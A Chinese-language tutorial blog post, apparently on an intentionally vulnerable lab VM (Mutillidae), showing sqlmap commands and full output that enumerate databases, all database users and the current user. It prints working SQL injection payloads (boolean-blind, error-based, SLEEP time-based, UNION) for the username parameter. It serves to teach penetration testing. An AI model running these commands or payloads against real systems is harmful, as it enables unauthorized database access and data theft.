SQLmap 自动注入 -02

1: 如果想获得SQL 数据库的信息,可以加入参数: -dbs

sqlmap -u "http://192.168.56.133/mutillidae/index.php?page=user-info.php&username=xiaosheng&password=abc&user-info-php-submit-button=View+Account+Details" --batch -p username -dbs

! legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

\* starting @ 06:07:47 /2025-01-21/

06:07:47 INFO resuming back-end DBMS 'mysql'

06:07:47 INFO testing connection to the target URL

you have not declared cookie(s), while server wants to set its own ('PHPSESSID=vpgtsrbl91e...40rho4rej4;showhints=1'). Do you want to use those Y/n Y

sqlmap resumed the following injection point(s) from stored session:


Parameter: username (GET)

Type: boolean-based blind

Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)

Payload: page=user-info.php&username=-4134' OR 5736=5736#&password=abc&user-info-php-submit-button=View Account Details

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

Payload: page=user-info.php&username=xiaosheng' AND (SELECT 6106 FROM(SELECT COUNT(*),CONCAT(0x717a627a71,(SELECT (ELT(6106=6106,1))),0x716b7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- uiLS&password=abc&user-info-php-submit-button=View Account Details

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: page=user-info.php&username=xiaosheng' AND (SELECT 4704 FROM (SELECT(SLEEP(5)))pmhr)-- ITco&password=abc&user-info-php-submit-button=View Account Details

Type: UNION query

Title: MySQL UNION query (NULL) - 7 columns

Payload: page=user-info.php&username=xiaosheng' UNION ALL SELECT NULL,CONCAT(0x717a627a71,0x4e564f5771416964435a7375556e7944795359717172507a7953457451746c5a5a61436565456677,0x716b7a7871),NULL,NULL,NULL,NULL,NULL#&password=abc&user-info-php-submit-button=View Account Details


06:07:48 INFO the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP, PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL >= 5.0

06:07:48 INFO fetching database names

06:07:50 WARNING reflective value(s) found and filtering out

available databases 34:

\* .svn

\* bricks

\* bwapp

\* citizens

\* cryptomg

\* dvwa

\* gallery2

\* getboo

\* ghost

\* gtd-php

\* hex

\* information_schema

\* isp

\* joomla

\* mutillidae

\* mysql

\* nowasp

\* orangehrm

\* personalblog

\* peruggia

\* phpbb

\* phpmyadmin

\* proxy

\* rentnet

\* sqlol

\* tikiwiki

\* vicnum

\* wackopicko

\* wavsepdb

\* webcal

\* webgoat_coins

\* wordpress

\* wraithlogin

\* yazd

06:07:52 INFO fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.133'

06:07:52 WARNING your sqlmap version is outdated

\* ending @ 06:07:52 /2025-01-21/

下面列一下参数的作用:

下面看一下执行结果:

! legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

\* starting @ 06:11:28 /2025-01-21/

06:11:29 INFO resuming back-end DBMS 'mysql'

06:11:29 INFO testing connection to the target URL

you have not declared cookie(s), while server wants to set its own ('PHPSESSID=jfganof3ik5...ukdpgiq063;showhints=1'). Do you want to use those Y/n Y

sqlmap resumed the following injection point(s) from stored session:


Parameter: username (GET)

Type: boolean-based blind

Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)

Payload: page=user-info.php&username=-4134' OR 5736=5736#&password=abc&user-info-php-submit-button=View Account Details

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

Payload: page=user-info.php&username=xiaosheng' AND (SELECT 6106 FROM(SELECT COUNT(*),CONCAT(0x717a627a71,(SELECT (ELT(6106=6106,1))),0x716b7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- uiLS&password=abc&user-info-php-submit-button=View Account Details

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: page=user-info.php&username=xiaosheng' AND (SELECT 4704 FROM (SELECT(SLEEP(5)))pmhr)-- ITco&password=abc&user-info-php-submit-button=View Account Details

Type: UNION query

Title: MySQL UNION query (NULL) - 7 columns

Payload: page=user-info.php&username=xiaosheng' UNION ALL SELECT NULL,CONCAT(0x717a627a71,0x4e564f5771416964435a7375556e7944795359717172507a7953457451746c5a5a61436565456677,0x716b7a7871),NULL,NULL,NULL,NULL,NULL#&password=abc&user-info-php-submit-button=View Account Details


06:11:30 INFO the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: Apache 2.2.14, PHP 5.3.2, PHP

back-end DBMS: MySQL >= 5.0

06:11:30 INFO fetching database users

06:11:32 WARNING reflective value(s) found and filtering out

database management system users 38:

\* 'bricks'@'%'

\* 'bwapp'@'%'

\* 'citizens'@'localhost'

\* 'cryptomg'@'%'

\* 'debian-sys-maint'@'localhost'

\* 'dvwa'@'%'

\* 'gallery2'@'localhost'

\* 'getboo'@'%'

\* 'ghost'@'%'

\* 'gtd-php'@'%'

\* 'hex'@'localhost'

\* 'joomla'@'localhost'

\* 'jotto'@'%'

\* 'kbloom'@'localhost'

\* 'mutillidae'@'%'

\* 'orangehrm'@'%'

\* 'personalblog'@'%'

\* 'peruggia'@'%'

\* 'phpbb'@'%'

\* 'phpmyadmin'@'localhost'

\* 'root'@'127.0.0.1'

\* 'root'@'brokenwebapps'

\* 'root'@'localhost'

\* 'sendmail'@'localhost'

\* 'sqlol'@'%'

\* 'stealth'@'localhost'

\* 'tikiwiki'@'localhost'

\* 'undertaker'@'localhost'

\* 'vicnum'@'localhost'

\* 'wackopicko'@'%'

\* 'wavsep'@'localhost'

\* 'webcal'@'localhost'

\* 'webgoat.net'@'%'

\* 'webmaster'@'localhost'

\* 'wordpress'@'%'

\* 'wraith'@'localhost'

\* 'yazd'@'%'

\* 'yazd10'@'%'

06:11:34 INFO fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.133'

06:11:34 WARNING your sqlmap version is outdated

\* ending @ 06:11:34 /2025-01-21/

可以看出上面是所有用户的结果,如果看当前用户,那么如下结果:

06:19:04 INFO the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP, PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL >= 5.0

06:19:04 INFO fetching current user

06:19:06 WARNING reflective value(s) found and filtering out

current user: 'mutillidae@%'

06:19:06 INFO fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.133'

06:19:06 WARNING your sqlmap version is outdated

\* ending @ 06:19:06 /2025-01-21/

参考文献: 16.SQL注入攻击_哔哩哔哩_bilibili

相关推荐
韩楚风6 小时前
【参天引擎】事务生命周期 / MVCC / Undo / ACID / 分布式事务 功能域整体解析
数据库·分布式·mysql·架构·cantian
愿做无知一猿7 小时前
Nacos连接MySQL异常?DataGrip竟成救星
数据库·mysql
G.O.G.O.G7 小时前
LeetCode SQL 从入门到精通(MySQL)06(上)
数据库·sql·mysql·leetcode
千桐科技7 小时前
qData 数据中台开源版从 MySQL 到 Doris完成一次数据同步
大数据·mysql·开源·doris·数据中台·qdata
Omics Pro9 小时前
深度学习多组学互作:组内+组间
数据库·人工智能·深度学习·mysql·搜索引擎·自然语言处理
残*影10 小时前
如何优雅地保存MySQL数据变更历史?
数据库·mysql
Database_Cool_11 小时前
数据仓库弹性扩缩容怎么实现?AnalyticDB MySQL 在线扩容 0 中断实战
数据库·数据仓库·mysql·阿里云
摸鱼号202315 小时前
在 Rocky Linux 10.1 Minimal 上安装 MySQL 9.7 的血泪史:MariaDB 到底有多“根深蒂固”?
mysql
万亿少女的梦16817 小时前
基于Spring Boot、Vue与MySQL的高校实习信息管理系统设计与实现
spring boot·mysql·vue·权限管理·restful api
宠友信息17 小时前
Spring Boot与Redis ZSet实现仿小红书源码双列瀑布流推荐
java·大数据·前端·spring boot·redis·mysql·uni-app